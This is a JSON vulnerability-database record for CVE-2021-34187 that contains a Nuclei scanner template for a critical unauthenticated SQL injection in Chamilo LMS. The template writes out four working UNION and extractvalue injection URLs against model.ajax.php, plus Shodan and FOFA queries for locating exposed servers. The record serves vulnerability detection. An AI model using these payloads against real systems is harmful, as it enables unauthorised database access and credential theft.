{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-34187/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-34187/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-34187/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-34187/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-34187/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-34187"},"sightings":{"href":"/api/v1/sightings/cve-2021-34187"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-34187.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2021-34187\n\ninfo:\n  name: Chamilo model.ajax.php - SQL Injection\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    main/inc/ajax/model.ajax.php in Chamilo through 1.11.14 allows SQL Injection via the searchField, filters, or filters2 parameter.\n  impact: |\n    Unauthenticated attackers can exploit SQL injection via multiple parameters to extract database contents, potentially exposing all Chamilo LMS data including user credentials.\n  remediation: |\n    Upgrade to Chamilo version 1.11.15 or later.\n  reference:\n    - https://murat.one/?p=118\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-34187\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-34187\n    cwe-id: CWE-89\n    epss-score: 0.16181\n    epss-percentile: 0.96791\n    cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: chamilo\n    product: chamilo\n    shodan-query: \"X-Powered-By: Chamilo\"\n    fofa-query: 'banner=\"X-Powered-By: Chamilo\"'\n    verified: true\n    max-request: 1\n  tags: cve,cve2021,chamilo,sqli,vkev,vuln\n\nvariables:\n  num: \"999999999\"\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+md5({{num}}))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0'\n      - '{{BaseURL}}/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(md5({{num}})))))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0'\n      - '{{BaseURL}}/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+md5({{num}}))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0'\n      - '{{BaseURL}}/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(md5({{num}})))))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0'\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '{{md5({{num}})}}'\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n# digest: 490a0046304402203f8d5525acb8f99e7a32fadaf8e17d2d9accfdfa31fc882b675c0d215686e3fb02204c3e22372c90f744b8a3a9c305f0c56f801554ceb83ef58251c241293b825242:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-34187"}